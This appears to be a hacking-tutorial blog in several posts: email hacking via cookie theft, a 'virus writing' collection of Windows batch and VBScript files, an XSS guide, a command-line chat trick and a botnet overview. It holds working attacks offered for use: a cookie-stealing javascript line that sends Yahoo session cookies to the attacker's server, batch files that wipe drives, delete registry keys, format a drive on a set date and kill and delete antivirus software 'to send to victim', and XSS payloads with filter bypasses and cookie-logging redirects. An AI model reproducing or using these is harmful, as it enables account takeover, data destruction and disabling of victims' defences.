Email Hacking

0
10 months ago
by ramakanta in

Email Hacking

Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong…
Ur Email-ID Can Be Hack… But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID’s But Truth Is Their Is No Software Present For Hacking Ur Mail ID’s..Email Hacking can be possible to many ways like:-

 1. Social Engineering2.Phishing Attacks3. Cookie Hijacking

4. By Keyloggers

Social Engineering:
This Process is defined as Hack the human mind without any tools…
This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple Psychological tricks that help to get the information we want.
This really works!! But it requires a lot of patience.
We are all talking about network security and fixing the vulnerabilities in networks.
But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily
exploited and compromised than the computers.
Social Engineering attacks have become most common during the chat sessions.
With the increase in use of Instant Messengers, any anonymous person may have a
chat with another any where in the world. The most crucial part of this attack is to
win the trust of the victim.

Phishing Attack:
The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

Cookie Hijacking:
In cookie hijacking we can hack email accounts very easily.. This trick is very
dangereous because whenever user change a password then there is no need to
attacker for again hack Email- ID of victim. And it would take you to inbox of victim’s yahoo account without asking for any password of victim account.

Keyloggers:
Keylogger is a software program or hardware device that is used to monitor and log
each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because
these programs and hardware devices monitor the keys typed in a user can easily
find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees
use work computers for business purposes only. Unfortunately, keyloggers can also
be embedded in spyware allowing your information to be transmitted to an unknown third part

Cookie Hijacking:

U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.
Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!..

Step 1: Download the Script on given link
http://www.multiupload.com/9Q3EPTOO47

Step:2 Download and extract files into your hard drive.
Step:3 Create a account in any ftp hosting site i suggested www.t35.com
Step4: Login to your account and upload 4 files into your ftp account.

Step5: Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory ‘cookies’

javascript:document.location=’http://yourdomain.com/yahoo.php?ex=’.concat(escape(document.cookie));

He would again redirected to his yahoo account.

Step6. Open the hacked.php . The password is ‘hoc’.

You must have got the username of victim’s account. Simply Click on it and it would take you to inbox of victim’s yahoo account without asking for any password of victim account.

By Keylogger:

Virus Writing

0
10 months ago
by ramakanta in

VIRUS WRITING

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

All Scripts Here Are To Be Copied In Note Pad

>>This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file

>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

>>The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat

>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

Save It As Anything.vbs

It Only Works With Windows XP

>>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

>>Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

>> Bomb Virus

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day

>>Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

>>Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

>>Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


What sex is your computer ?

-> open notepad
-> copy code

CreateObject(“SAPI.SpVoice”).Speak”I love YOU”

-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it

Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..
How To Disable Victim Antivirus.

Open Notepad Copy it and Paste To Notepad

@ echo off
rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem –

Now Save this code as .bat and send to victim :)


>>Tasks Kill

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause


  save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!

>>Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!


>>Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop


>> To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox(“Enter your text”,”Talk it”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok.”

u will hear now what u typed..

this works in xp, vista, win7 also.

enjoy!!!

Cross Site Scripting (XSS)

0
10 months ago
by ramakanta in

‘XSS’ also known as ‘CSS’ – Cross Site Scripting. It is a very common vulnerability found in Web Applications, ‘XSS’ allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an “attacker” to inject some code into the applications affected in order to bypass access to the website or to apply  “phishing” on falls users.
This technique is also used for website Hacking.

Types of XSS
There are actually three types of Cross-Site Scripting, commonly named as:
- DOM-Based XSS
- Non-persistent XSS
- Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes “since born” some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:
- The attacker creates a well builded malicious website
- The ingenuous user opens that site
- The user has a vulnerable page on his machine
- The attacker’s website sends commands to the vulnerable HTML page
- The vulnerable local page execute that commands with the user’s privileges
on that machine.
- The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as “non-persistent” because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website
is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn’t need to
provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of “guestbooks”. Usually the users uses
that kind of tool to leave messages to the owned
of the website and at a first look it doesn’t seems something dangerous, but if an
attacker discover that the system is vulnerable can insert some malicious code in his
message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn’t do any
check on the content of the inserted message: it just inserts the data provided from
the user into the result page.


How to Find XSS Vulnerabilities:-

To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too many to mention.

Using ‘Google Dorks’ to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:”search.php?q=” now that is a common page and has alot
of results. Also note that most sites have XSS Vulnerabilities, its just having a good
eye, and some good knowledge on how to bypass there filteration.

Basics of XSS
Well now lets start learning some Actual Methods, the most common used XSS
injection is :

<script>alert(“Ramakanta”)</script>

now this will alert a popup message, saying “Ramakanta” without quotes.

So,use “search.php?q=” and you can simple try the following on a website with the
same thing,

http://website.com/search.php?q=<script>alert(“Ramakanta”)</script>

There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :

http://website.com/search.php?q=<br><br><b><u>Ramakanta</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.

Example:

How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC=”http://website.com/yourDefaceIMAGE.png”></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything
that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC=”http://site.com/yourDefaceIMAGE.png”>

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another
method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC=”http://site.com/xss.swf”

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( “http://www.hackersonlineclub.tk/” )</script>

There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here:
How To Make A Cookie Stealer Php script ?

ok now you have it save it has a .php file and upload to your server, remember to
create the file ‘log.txt’ too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.

window.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

or

document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie


How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is

‘)alert(‘xss’);

or

“);alert(‘xss’);

that will do the same thing has <script>alert(“XSS”)</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit, Please note
its bad practice to use alert(“XSS”) to test for XSS, because some sites block the
keyword “XSS” before so we using “Ramakanta”.

Some other ways to bypass filtration
website.com/search.php?q=”><script>alert(‘Ramakanta’)</script>
website.com/search.php?q=”><script>alert(“Ramakanta”)</script>
website.com/search.php?q=”><script>alert(“Ramakanta”);</script>
website.com/search.php?q=”><script>alert(/Ramakanta”);</script>
website.com/search.php?q=//”><script>alert(/Ramakanta/);</script>
website.com/search.php?q=xyz<script>alert(/Ramakanta/);</script>
website.com/search.php?q=xyz”><script>alert(/Ramakanta/);</script>
website.com/search.php?q=xyz”></script><script>alert(/Ramakanta/);</script>
website.com/search.php?q=000″><script></script><script>alert(Ramakanta);</script>
website.com/search.php?q=000xyz</script><script>alert(/Ramakanta/);</script>
website.com/search.php?q=–<script>”></script>alert(/Ramakanta/);</script>
website.com/search.php?q=”><img src=’javascript:alert(‘Ramakanta’);’>
website.com/search.php?q=”><script src=’http://virus.js’</script>

Advanced XSS – way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where ‘Magic Quotes’ is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here

http://www.asciitable.com/
http://easycalculation.com/

This will help you write what you want, In my examples ill be writing “HOC” this is the following code

72 79 67

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(72, 79, 67)

Ok now “String.fromCharCode(72, 79, 67)” Is a JAVA (ASCII) way of saying “HOC”.
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>

For More Script Coding Of XSS Visit
http://ha.ckers.org/xss.html

Chat with Friends through Command Prompt

0
10 months ago
by ramakanta in

Hello friends Now U Can Chat With Command Prompt THrough So Here IS Trick…..

1) All you need is your friend’s IP Address and your Command Prompt.

2) Open Notepad and write this code as it is…..!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as “Messenger.Bat”.

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

 

 

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

 

8) Now all you need to do is type your message and press Enter.
Start Chatting…….!


DONE….ENJOY.~!!                                                                                   Ramakanta Tripathy

Botnets

0
10 months ago
by ramakanta in

A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.

Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots
These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spyware
Its a software which sends information to its creators about a user’s activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

Adware
Its exists to advertise some commercial entity actively and without the user’s permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring
A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim’s phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.                                                                                                           Ramakanta Tripathy

Go to Top